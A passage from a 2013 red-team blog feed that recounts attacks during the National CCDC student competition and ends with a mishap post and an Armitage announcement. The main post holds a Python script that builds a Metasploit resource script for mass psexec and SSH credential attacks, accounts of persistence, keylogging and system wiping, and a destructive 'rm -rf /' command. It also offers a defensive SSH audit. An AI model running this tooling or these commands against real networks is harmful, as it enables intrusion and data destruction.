<p>Once a scan comes back, I sort my host display by the operating system icon. I simply highlight all Windows systems and launch the ms08_067_netapi module against them. This year, due to a bar on <a href="http://www.room362.com/">Mubix&#8217;s</a> worm, we were given a list of potential default passwords&#8211;for the first time in National CCDC history. I used this information to execute psexec against all of the remaining Windows hosts. If I did not have the default credentials, I would use a <a href="https://github.com/rsmudge/cortana-scripts/tree/master/wce">Cortana script</a> to run <a href="http://www.ampliasecurity.com/research/wcefaq.html">Windows Credential Editor</a> to get them.</p>
<p><a href="http://rsmudge.files.wordpress.com/2013/04/psexecallthethings.png"><img class="aligncenter size-large wp-image-2072" alt="psexecallthethings" src="http://rsmudge.files.wordpress.com/2013/04/psexecallthethings.png?w=450&#038;h=280" width="450" height="280" /></a></p>
<p>As Windows sessions came in, I had a Cortana script loaded that would automatically install my beachhead executable onto the systems. The persistence mechanics were nothing new. They were very similar to last year&#8217;s <a href="http://blog.strategiccyber.com/2012/10/04/dirty-red-team-tricks-ii-at-derbycon-2-0/">Dirty Red Team Tricks</a> talk. The beachhead executable&#8217;s only purpose was to connect to me, download Beacon, and inject it into memory.</p>
<p>Once I had the Windows systems, I ran the Metasploit Framework&#8217;s ssh_login module against all of the UNIX systems with root and each of the suspect default credentials. Armitage and Cobalt Strike tip&#8211;hold Shift as you click Launch to run a module but keep the dialog open. This makes it really easy to try multiple variations of an attack very quickly.</p>
<div id="attachment_2064" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/verifyingsshkeys.png"><img class="size-large wp-image-2064" alt="Checking out those SSH keys" src="http://rsmudge.files.wordpress.com/2013/04/verifyingsshkeys.png?w=450&#038;h=282" width="450" height="282" /></a><p class="wp-caption-text">Checking out those SSH keys</p></div>
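<p>The targeting steps above (sweep, bucket hosts by OS, run one module against every host in the bucket), as an added example in Python that is not code from the original post, from Cobalt Strike or from Cortana: it parses a scan saved with <code>-oX</code> and writes the equivalent msfconsole resource script. It assumes the OS family comes from nmap&#8217;s osclass data, and that RHOSTS, SMBUser, SMBPass, USERNAME and PASSWORD are the option names of the current psexec and ssh_login modules (in 2013, psexec took a single RHOST). The scan XML and the credentials are constructed for this example.</p>

```python
"""Added example, not code from the original post, Cobalt Strike or Cortana.

Bucket the hosts from the opening nmap sweep the way the post describes
(Windows with 445 open, everything else with 22 open) and emit a Metasploit
resource script that runs one module per bucket against all hosts at once.
Assumptions: nmap output saved with -oX; current module option names.
SAMPLE_NMAP_XML and the credentials are constructed for this example.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Set, Tuple

SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -sV -O -T4 --min-hostgroup 96 -p 22,445 -oX scan.xml 10.0.1.0/24">
  <host><status state="up"/><address addr="10.0.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="closed"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows Server 2003 SP2" accuracy="98"><osclass osfamily="Windows"/></osmatch></os>
  </host>
  <host><status state="up"/><address addr="10.0.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="445"><state state="filtered"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.32" accuracy="95"><osclass osfamily="Linux"/></osmatch></os>
  </host>
  <host><status state="up"/><address addr="10.0.1.30" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/></port>
    </ports>
    <os><osmatch name="Sun Solaris 10" accuracy="90"><osclass osfamily="Solaris"/></osmatch></os>
  </host>
  <host><status state="down"/><address addr="10.0.1.40" addrtype="ipv4"/></host>
</nmaprun>
"""


def os_family(host: ET.Element) -> str:
    """Best-guess OS family: nmap's osclass first, then the SMB banner."""
    classes = host.findall("./os/osmatch/osclass")
    if classes:
        return classes[0].get("osfamily", "unknown").lower()
    names = {p.get("name", "") for p in host.findall("./ports/port/service")}
    return "windows" if "microsoft-ds" in names else "unknown"


def open_ports(host: ET.Element) -> Set[int]:
    return {int(p.get("portid")) for p in host.findall("./ports/port")
            if p.find("state").get("state") == "open"}


def triage(xml_text: str) -> Dict[str, List[str]]:
    """Live hosts split into the two low-hanging-fruit lists from the post."""
    buckets: Dict[str, List[str]] = {"windows_smb": [], "unix_ssh": []}
    for host in ET.fromstring(xml_text).findall("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        family, ports = os_family(host), open_ports(host)
        if family == "windows" and 445 in ports:
            buckets["windows_smb"].append(addr)
        elif family != "windows" and 22 in ports:
            buckets["unix_ssh"].append(addr)
    return buckets


def resource_script(buckets: Dict[str, List[str]],
                    smb_creds: List[Tuple[str, str]],
                    ssh_creds: List[Tuple[str, str]]) -> List[str]:
    """Lines for msfconsole -r: one module run per credential per bucket."""
    lines: List[str] = []
    if buckets["windows_smb"]:
        rhosts = " ".join(buckets["windows_smb"])
        for user, pw in smb_creds:
            lines += ["use exploit/windows/smb/psexec", f"set RHOSTS {rhosts}",
                      f"set SMBUser {user}", f"set SMBPass {pw}", "run -j"]
    if buckets["unix_ssh"]:
        rhosts = " ".join(buckets["unix_ssh"])
        for user, pw in ssh_creds:
            lines += ["use auxiliary/scanner/ssh/ssh_login", f"set RHOSTS {rhosts}",
                      f"set USERNAME {user}", f"set PASSWORD {pw}", "run"]
    return lines


if __name__ == "__main__":
    # Placeholder credentials; the event's default-password list is not reproduced here.
    targets = triage(SAMPLE_NMAP_XML)
    print("\n".join(resource_script(targets, [("Administrator", "Password1")], [("root", "toor")])))
```

<p>Solaris hosts land in the SSH bucket on purpose, matching what the post did; ssh_login simply fails there, as it did at the event.</p>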
<p>Once again, I had a Cortana script loaded to automatically install some persistence on the UNIX systems. I didn&#8217;t do much to the UNIX systems at National CCDC because I did not want to step on my other red team members. I simply dropped an SSH key for root and altered the SSH configuration to allow the one key to work for any user on the system.</p>
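<p>The UNIX persistence just described is what a blue team should be hunting for, so here is the matching audit as an added example in Python (not code from the original post or from Cobalt Strike). The post does not say which sshd directive was altered; the example assumes <code>AuthorizedKeysFile</code> pointed at an absolute path without the per-user tokens <code>%u</code> or <code>%h</code>, which makes one key file valid for every user, and it also checks <code>PermitRootLogin</code> and compares the fingerprints in root&#8217;s <code>authorized_keys</code> against an allowlist. The config and key material are constructed for this example.</p>

```python
"""Added example, not code from the original post or from Cobalt Strike.

Audit an sshd_config and an authorized_keys file for the persistence
described above: a dropped key for root plus a configuration change that
lets one key file authenticate any user. Assumption (the post does not name
the directive): the check targets AuthorizedKeysFile entries that are
absolute paths without the per-user tokens %u or %h, and PermitRootLogin.
The config and key material below are constructed for this example.
"""
import base64
import hashlib
import struct
from typing import Iterable, List, Tuple

KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521", "ssh-dss")


def _fake_key(key_type: str, seed: bytes, comment: str) -> str:
    """A syntactically valid public key line built from a seed (not a real key)."""
    pub = hashlib.sha256(seed).digest()  # 32 stand-in bytes for the key material
    blob = (struct.pack(">I", len(key_type)) + key_type.encode()
            + struct.pack(">I", len(pub)) + pub)
    return f"{key_type} {base64.b64encode(blob).decode()} {comment}"


SAMPLE_SSHD_CONFIG = """\
# constructed sshd_config
Port 22
PermitRootLogin yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys /etc/ssh/.keys
Match User backup
    AuthorizedKeysFile /etc/ssh/backup_keys
"""

SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed /root/.ssh/authorized_keys",
    'from="10.0.0.0/8" ' + _fake_key("ssh-ed25519", b"admin-laptop", "admin@laptop"),
    _fake_key("ssh-ed25519", b"dropped-by-red", "sysupdate"),
    "",
])


def parse_sshd_config(text: str) -> List[Tuple[str, str, str]]:
    """(scope, keyword, value) triples; keyword lower-cased, scope 'global'
    or the criteria of the Match block the directive sits under."""
    scope, out = "global", []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            scope = value
            continue
        out.append((scope, key, value))
    return out


def audit_sshd_config(text: str) -> List[str]:
    """Findings that would let a single dropped key work beyond one account."""
    findings = []
    for scope, key, value in parse_sshd_config(text):
        if key == "authorizedkeysfile":
            for path in value.split():
                # Relative paths resolve under each user's home; an absolute
                # path with no %u/%h is read for every user the scope covers.
                if path.startswith("/") and "%u" not in path and "%h" not in path:
                    findings.append(f"[{scope}] AuthorizedKeysFile {path} is shared by every user in scope")
        elif key == "permitrootlogin" and value.lower() != "no":
            # prohibit-password still accepts keys, which is all a dropped key needs.
            findings.append(f"[{scope}] PermitRootLogin {value}")
    return findings


def _key_fields(line: str) -> Tuple[str, str, str]:
    """(type, base64 blob, comment) of an authorized_keys line, skipping any
    leading options (options containing spaces are not handled here)."""
    fields = line.split()
    idx = next(i for i, f in enumerate(fields) if f in KEY_TYPES or f.startswith("sk-"))
    return fields[idx], fields[idx + 1], " ".join(fields[idx + 2:])


def fingerprint(line: str) -> str:
    """OpenSSH-style SHA256 fingerprint, as ssh-keygen -lf prints it."""
    _, blob_b64, _ = _key_fields(line)
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def unknown_keys(text: str, allowed: Iterable[str]) -> List[Tuple[str, str]]:
    """(fingerprint, comment) for each key whose fingerprint is not allowlisted."""
    allowed = set(allowed)
    bad = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fp = fingerprint(line)
        if fp not in allowed:
            bad.append((fp, _key_fields(line)[2]))
    return bad


if __name__ == "__main__":
    print("\n".join(audit_sshd_config(SAMPLE_SSHD_CONFIG)))
    known = {fingerprint(_fake_key("ssh-ed25519", b"admin-laptop", "admin@laptop"))}
    for fp, comment in unknown_keys(SAMPLE_AUTHORIZED_KEYS, known):
        print("unknown key", fp, comment)
```

<p>Comparing fingerprints rather than comments matters here: a dropped key can carry any comment it likes, and a plausible one like <code>sysupdate</code> is exactly what a student skimming the file will skip past.</p>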
<h3>Team Server</h3>
<p>After the opening salvo, I had successfully exploited the Windows systems with port 445 open in the competition environment and I had root access to the UNIX systems with SSH open (except for the Solaris systems assigned to each team). This whole process took 1 to 2 minutes total. In theory, I had backdoors on each of these systems too, but I had no way to know because I had not yet set up a team server.</p>
<p>I went to work to set up a Cobalt Strike team server. Of the four staging addresses I created, I had bound only one of them. Once Cobalt Strike was up, I connected my client to this team server, set up the Beacon listener, and gave it a different list of IP addresses to beacon back to.</p>
<p><a href="http://www.advancedpentest.com/help-beacon">Beacon</a> is a Cobalt Strike-specific payload. It doesn&#8217;t require a persistent connection to the target, rather it phones home every so often to request tasks to execute. I created Beacon to act as a quiet (in memory) persistence agent. The idea is you can use it to spawn a new Meterpreter session when it&#8217;s needed. In a pinch, Beacon can also act as a remote administration tool if your Meterpreter traffic is squashed by network defenses.</p>
<div id="attachment_2068" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/spawningasession.png"><img class="size-large wp-image-2068" alt="Beacon -- give me shell!" src="http://rsmudge.files.wordpress.com/2013/04/spawningasession.png?w=450&#038;h=281" width="450" height="281" /></a><p class="wp-caption-text">Beacon &#8212; give me shell!</p></div>
<p>Once the listener was up, I noticed my Beacons were coming back and I was able to verify that we had all Windows systems in the competition environment at that time. This really allowed us to give students a fair game. Each team was owned, from the beginning, with the same backdoors.</p>
<h3>Cobalt Strike Use</h3>
<p>I then spent time getting folks who asked for it set up with Cobalt Strike so they could task their own Beacons. Several tools were in play on the National CCDC Red Team. I saw <a href="http://www.scriptjunkie.us/msfgui/">msfgui</a>, <a href="http://www.offensive-security.com/metasploit-unleashed/Msfconsole">msfconsole</a>, <a href="http://www.coresecurity.com/core-impact-pro">Core Impact</a>, <a href="http://unremote.org/">Dark Comet</a>, and <a href="http://www.advancedpentest.com">Cobalt Strike</a>. There was some <a href="http://www.fastandeasyhacking.com/">Armitage</a> too early on, but I showed those folks how they could <a href="http://blog.strategiccyber.com/2013/02/12/a-vision-for-distributed-red-team-operations/">connect Cobalt Strike to multiple Metasploit Framework instances</a> at once and that did away with that.</p>
<p>8 out of 10 blue teams had at least one red team member using Cobalt Strike to conduct post-exploitation and gain more access into their network. By my count, 15 out of 20 red cell members were using Cobalt Strike. 12 of the 20 red team members used only Cobalt Strike&#8211;primarily through the local team server without any other penetration testing platform in use. In effect, 8 simultaneous engagements were happening through one team server. Wow!</p>
<p>The workspaces feature helped a lot with this. Each Cobalt Strike user was able to define a workspace that showed them only the hosts, services, and sessions for their team.</p>
<div id="attachment_2067" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/collabhacking.png"><img class="size-large wp-image-2067" alt="Collaborative Hacking at its Finest" src="http://rsmudge.files.wordpress.com/2013/04/collabhacking.png?w=450&#038;h=281" width="450" height="281" /></a><p class="wp-caption-text">Collaborative hacking&#8230; at its finest</p></div>
<p>As a developer, nothing excites me more than seeing someone use a tool I wrote. I&#8217;m very honored that so many well respected professionals in this field gave Cobalt Strike&#8217;s toolset a try during the National CCDC event.</p>
<h3>Other Tools</h3>
<p>Some custom stuff was in use during National CCDC. We had a custom Linux backdoor, something that works a lot like Beacon deployed to student systems. We also used Dark Comet to further fortify our access to student systems once the initial salvo was complete. Individually, a few red team members chose to deploy different RATs against their specific team, but I&#8217;m not aware of anything else that was done on an all teams basis.</p>
<p>We were also using a data management system developed by <a href="https://twitter.com/alexlevinson">Alex Levinson</a>, <a href="https://twitter.com/maus_">Maus</a>, and <a href="https://twitter.com/vyrus001">Vyrus</a> to keep track of shared information and automatically track red activity, based on a Metasploit Framework instrumentation plugin. My favorite part of the whole system&#8211;it integrates etherpad and I&#8217;m in love with etherpad for red team information sharing. It&#8217;s much better than a wiki.</p>
<h3>Tempo</h3>
<p>Once we were in, post-exploitation was up to each individual cell. Knowing that we had equal access and persistence across all teams, I greatly enjoyed the opportunity to focus on one team. The first day, our job as the red team was to stay in and quietly steal data. We were under strict instructions to not do anything that might reveal our presence. I spent the first day setting up keystroke loggers, downloading interesting files, taking screenshots, and occasionally sweeping the network to try to get access to other hosts that the initial salvo didn&#8217;t give us.</p>
<div id="attachment_2070" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/wceforthewin.png"><img class="size-large wp-image-2070" alt="Windows Credential Editor is my co-pilot" src="http://rsmudge.files.wordpress.com/2013/04/wceforthewin.png?w=450&#038;h=283" width="450" height="283" /></a><p class="wp-caption-text">Windows Credential Editor is my co-pilot</p></div>
<p>At the start of day 2, we still had access to Windows systems on all teams&#8217; cloud networks. We also had access to at least one box on most teams&#8217; local networks. Some systems were beaconing to our local team server, a few were beaconing over DNS to a node in Amazon&#8217;s elastic computing cloud. The National CCDC event required teams to configure a proxy on each Windows system for it to connect to the internet. This didn&#8217;t happen on all systems, limiting my external Beacons. The second pool of accesses was still helpful in some cases though.</p>
<p>On day two, our team captain started blasting some classical music and instructing us to burn all of our boxes. The idea&#8211;get in on day 1, stay there, let the students snapshot their virtual machines with our backdoors, let them trust their snapshots, and on day 2&#8211;destroy their systems. We bounced systems for the first few hours of the day. We would jump on, destroy it, the students would restore it, our beacons would phone home, we&#8217;d request a meterpreter session, and then we&#8217;d destroy the system again.</p>
<div id="attachment_2074" class="wp-caption aligncenter" style="width: 460px"><a href="http://rsmudge.files.wordpress.com/2013/04/noooo.png"><img class="size-large wp-image-2074" alt="blue team: nooooo red team: yes yes yes" src="http://rsmudge.files.wordpress.com/2013/04/noooo.png?w=450&#038;h=280" width="450" height="280" /></a><p class="wp-caption-text">blue team: nooooo red team: yes yes yes</p></div>
<blockquote class='twitter-tweet' lang='en'><p>&lt;in a run window&gt;  me:Noooooooooooo  RedTeam:yes yes yes yes.   <a href="http://twitter.com/search?q=%23nccdc" title="#nccdc">#nccdc</a> <a href="http://twitter.com/search?q=%23blueteamprobs" title="#blueteamprobs">#blueteamprobs</a> @<a href="https://twitter.com/armitagehacker">armitagehacker</a> <a href="http://t.co/PDNJCap15t" rel="nofollow">http://t.co/PDNJCap15t</a></p>&mdash; <br />Corey Hadley (@hadley1210) <a href='http://twitter.com/#!/hadley1210/status/325970784931700736' data-datetime='2013-04-21T13:54:26+00:00'>April 21, 2013</a></blockquote>
<p>This happened all throughout the morning. As a person who likes to keep access until the end, this was scary. Students were put into a catch-22 situation. They could revert to a snapshot with all of the work they did to the system + our backdoors or they could revert to a clean image. By the end of the morning, many teams opted to revert to the clean image.</p>
<span class='embed-youtube' style='text-align:center; display: block;'><iframe class='youtube-player' type='text/html' width='450' height='284' src='http://www.youtube.com/embed/bbWENI8Yokc?version=3&#038;rel=1&#038;fs=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;wmode=transparent' frameborder='0'></iframe></span>
<p>We were able to re-exploit systems hosted in the student&#8217;s cloud networks when they were reverted to a clean image and rebackdoor them. That part was pretty easy. As the day went on, one red cell member might make a discovery and call everyone else&#8217;s attention to it. We would then work on replicating that discovery in our environment.</p>
<p>For example, <a href="http://www.scriptjunkie.us/">Matt Weeks</a> discovered a webshell pre-implanted by the competition organizers on an internal system. All of us found the webshell on our teams and went to work through it. In the default configuration, this webshell existed on Windows systems giving us access to internal networks for some of the teams. By this time, access to internal networks was a nice find. We bounced student systems so many times, that the teams reverted to a clean snapshot for their internal systems.</p>
<p>My team had migrated their web server from Windows to Ubuntu Linux. Fortunately, they kept the webshell with the migrated site giving us access to that system as well.</p>
<p>Each red team member had a good understanding of the point system. We knew, for example, that a root/administrator level intrusion counted once and only once per unique attack vector. There was no point in exploiting systems time and again with the same thing.</p>
<p>We also knew that credit cards and other data flags were worth points.</p>
<p>One of the biggest hits we could make a team take came from publishing credit card information to their website for the whole world to see. We made sure to make this happen for all teams, where it was possible.</p>
<p>Overall, the plan worked. We didn&#8217;t achieve Dave&#8217;s life long dream of seeing every team down for every service across the board. But, we were very well organized, we collaborated, and this year we gave the students at the National CCDC event the fairest and most balanced red experience yet.</p>
<p>Congratulations to RIT on its first National CCDC win. Congratulations to Dakota State University on a very close second place finish.</p>
<p>See also:</p>
<ul>
<li><a href="http://hackingexposedcomputerforensicsblog.blogspot.com/2013/04/nccdc-2013-wrap-up.html">David Cowen&#8217;s NCCDC Wrap-up (with out-brief slides)</a></li>
<li><a href="https://alexlevinson.wordpress.com/2013/04/24/ccdc-2013-red-team-feedback/">Alex Levinson&#8217;s Feedback to the Students</a></li>
<li><a href="http://hackingexposedcomputerforensicsblog.blogspot.com/2013/04/nccdc-2013-lessons-learned.html">David Cowen&#8217;s NCCDC Lessons Learned</a></li>
<li><a href="http://blogs.mcafee.com/cto/nccdc-2013-red-team-recap">Jim Walter&#8217;s NCCDC 2013 Recap</a></li>
</ul>
<br />Filed under: <a href='http://blog.strategiccyber.com/category/red-team-2/'>Red Team</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rsmudge.wordpress.com/2045/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rsmudge.wordpress.com/2045/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.strategiccyber.com&#038;blog=28734211&#038;post=2045&#038;subd=rsmudge&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/04/24/national-ccdc-red-team-fair-and-balanced/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/tliyrhqy.jpeg?w=450" medium="image">
			<media:title type="html">Seriously, this won&#039;t do you that much good.</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/psexecallthethings.png?w=450" medium="image">
			<media:title type="html">psexecallthethings</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/verifyingsshkeys.png?w=450" medium="image">
			<media:title type="html">Checking out those SSH keys</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/spawningasession.png?w=450" medium="image">
			<media:title type="html">Beacon -- give me shell!</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/collabhacking.png?w=450" medium="image">
			<media:title type="html">Collaborative Hacking at its Finest</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/wceforthewin.png?w=450" medium="image">
			<media:title type="html">Windows Credential Editor is my co-pilot</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/noooo.png?w=450" medium="image">
			<media:title type="html">blue team: nooooo red team: yes yes yes</media:title>
		</media:content>
	</item>
		<item>
		<title>PSA: A Safety Lesson about Team Servers</title>
		<link>http://blog.strategiccyber.com/2013/04/21/psa-a-safety-lesson-about-team-servers/</link>
		<comments>http://blog.strategiccyber.com/2013/04/21/psa-a-safety-lesson-about-team-servers/#comments</comments>
		<pubDate>Sun, 21 Apr 2013 13:08:27 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[oops]]></category>
		<category><![CDATA[my bad]]></category>
		<category><![CDATA[doh]]></category>
		<category><![CDATA[karma]]></category>
		<category><![CDATA[serendipity]]></category>
		<category><![CDATA[what it feels like]]></category>
		<category><![CDATA[I rm'd a lot of boxes and it felt good until this]]></category>
		<category><![CDATA[destroying boxes still feels good]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=2035</guid>
		<description><![CDATA[Here&#8217;s a fun anecdote for you. I usually run a Cobalt Strike team server at the CCDC events and other exercises I go to. No problem. I have a virtual machine I use as the team server. There are no sensitive files on it and fortunately, it&#8217;s a virtual machine. I don&#8217;t care what happens to [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.strategiccyber.com&#038;blog=28734211&#038;post=2035&#038;subd=rsmudge&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Here&#8217;s a fun anecdote for you. I usually run a Cobalt Strike team server at the CCDC events and other exercises I go to. No problem. I have a virtual machine I use as the team server. There are no sensitive files on it and fortunately, it&#8217;s a virtual machine. I don&#8217;t care what happens to it.</p>
<p>At the end of the <a href="http://www.nationalccdc.org">National CCDC</a> event, our team captain announced that if we have access, we&#8217;re wrong&#8230; burn it! So, in a maniacal way, all of us jumped on sessions and destroyed system after system. All well and good, this is standard operating procedure for most exercise red teams&#8230; at the very end of an event.</p>
<p>In our maniacal zeal to take these actions, we sometimes make mistakes, it happens.</p>
<p>Anyways, let me relay a little factoid.</p>
<p>The <a href="http://www.metasploit.com">Metasploit Framework</a> has a console. Any input the console does not understand is immediately passed to the operating system, for your convenience. This input is run and its output is presented to you, the user. In classes, I&#8217;ve seen many people think they have shell when they type <code>whoami</code> in a Metasploit Console and learn that they&#8217;re root. They&#8217;re root, but it&#8217;s on their own system.</p>
<p>So, in the zeal at the end of the National CCDC event, someone issued an <code>rm -rf /</code> command to my team server. I lost data that would later become a large generated report I could provide to the teams (next year!). I&#8217;m not too worried about that. I wanted to speak to the safety lesson, one I discovered later.</p>
<p>I told VMware to share folders with my host operating system. Fortunately, I was sharing just a Dropbox folder with several tools that I keep around. I have a backup of all this stuff, no big deal.</p>
<p>These folders were gone!</p>
<p><a href="http://rsmudge.files.wordpress.com/2013/04/burned.jpg"><img class="aligncenter size-large wp-image-2036" alt="burned" src="http://rsmudge.files.wordpress.com/2013/04/burned.jpg?w=450&#038;h=281" width="450" height="281" /></a></p>
<p>If I had shared my home folder&#8230; oh boy! That was a close call, pretty funny since <strong><em>no harm came of it</em></strong>. Pretty scary otherwise.</p>
<p>If you&#8217;re going to host infrastructure for an event, do it on a separate server. If you&#8217;re crazy enough to use your laptop, like I am, make sure there&#8217;s isolation between your virtual machine and your operating system.</p>
<p> <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br />Filed under: <a href='http://blog.strategiccyber.com/category/uncategorized/'>Uncategorized</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rsmudge.wordpress.com/2035/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rsmudge.wordpress.com/2035/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.strategiccyber.com&#038;blog=28734211&#038;post=2035&#038;subd=rsmudge&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/04/21/psa-a-safety-lesson-about-team-servers/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>

		<media:content url="http://rsmudge.files.wordpress.com/2013/04/burned.jpg?w=450" medium="image">
			<media:title type="html">burned</media:title>
		</media:content>
	</item>
		<item>
		<title>Metasploit 4.6 &#8211; Now with less Open Source GUI</title>
		<link>http://blog.strategiccyber.com/2013/04/11/metasploit-4-6-now-with-less-open-source-gui/</link>
		<comments>http://blog.strategiccyber.com/2013/04/11/metasploit-4-6-now-with-less-open-source-gui/#comments</comments>
		<pubDate>Thu, 11 Apr 2013 12:00:16 +0000</pubDate>
		<dc:creator>rsmudge</dc:creator>
				<category><![CDATA[Armitage]]></category>

		<guid isPermaLink="false">http://blog.strategiccyber.com/?p=1953</guid>
		<description><![CDATA[Last week, I received an email from Tod B. at Rapid7 stating that the next binary installer of Metasploit would ship without Armitage and msfgui. Metasploit 4.6 drops both programs. According to Tod, the Metasploit Framework repository on Github will also drop both projects in the near future. The reason given is that Rapid7 does [&#8230;]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.strategiccyber.com&#038;blog=28734211&#038;post=1953&#038;subd=rsmudge&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Last week, I received an email from <a href="https://twitter.com/todb">Tod B.</a> at Rapid7 stating that the next binary installer of Metasploit would ship without <a href="http://www.fastandeasyhacking.com/">Armitage</a> and <a href="http://www.scriptjunkie.us/msfgui/">msfgui</a>. Metasploit 4.6 drops both programs. According to Tod, the Metasploit Framework repository on Github will also drop both projects in the near future.</p>
<p>The reason given is that Rapid7 does not want to confuse users about which products they do and do not support.</p>
<p>When I released Armitage in November 2010, I had one simple goal&#8211;release something that would get into BackTrack Linux. I didn&#8217;t expect that it would make it into the Metasploit Framework. I even had a license scheme that prohibited it (GPLv2). <a href="http://hdm.io/">HD Moore</a> approached me and asked me to change my license to BSD. If I agreed to change my license, HD would ship Armitage with the Metasploit Framework. I never expected this and I always saw this distribution as a privilege, not a right.</p>
<p>Thank you HD and Rapid7 for making Armitage part of the Metasploit Framework for the past two years. </p>
<p>For the thousands of Armitage hackers out there, I&#8217;d like to clarify how this affects you. The short answer&#8230; this isn&#8217;t a big deal.</p>
<ul>
<li>I maintain Armitage and will continue to do so. I average one release every six weeks or so. In fact, I pushed <a href="http://www.fastandeasyhacking.com/changelog">a release</a> yesterday.</li>
<li>I do not have an automated update process for Armitage. You&#8217;ll have to <a href="http://www.fastandeasyhacking.com/download">download it</a> from its homepage. You can <a href="http://www.fastandeasyhacking.com/changelog">signup to get an email notification</a> when a new Armitage update is available.</li>
<li>Armitage still works out of the box with a properly installed Metasploit environment. If you have <a href="http://www.metasploit.com">Metasploit Community Edition</a> setup, you can download Armitage, extract it, and run it. It will work like it always has.</li>
<li>You can <a href="http://blog.strategiccyber.com/2013/03/13/missing-in-action-armitage-on-kali-linux/">use Armitage with Kali Linux</a> as well.</li>
<li>If you&#8217;d like to support my work, Cobalt Strike is the way to do it. Check that it <a href="http://www.advancedpentest.com/help-armitage-vs-cobaltstrike">supports your needs</a> first (I&#8217;m a value in exchange for value kind of hacker). If Cobalt Strike isn&#8217;t for you, but you still love Armitage, a simple thank you is good too.</li>
</ul>
<p>The Armitage homepage is still <a href="http://www.fastandeasyhacking.com">http://www.fastandeasyhacking.com/</a></p>
<br />Filed under: <a href='http://blog.strategiccyber.com/category/armitage-2/'>Armitage</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rsmudge.wordpress.com/1953/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rsmudge.wordpress.com/1953/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.strategiccyber.com&#038;blog=28734211&#038;post=1953&#038;subd=rsmudge&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.strategiccyber.com/2013/04/11/metasploit-4-6-now-with-less-open-source-gui/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/44a44db75f21982b563b1febf38b27ad?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">rsmudge</media:title>
		</media:content>
	</item>
		<item>
		<title>Cobalt Strike Updates 04.10.13</title>
		<link>http://blog.strategiccyber.com/2013/04/10/cobalt-strike-updates-04-10-13/</link>
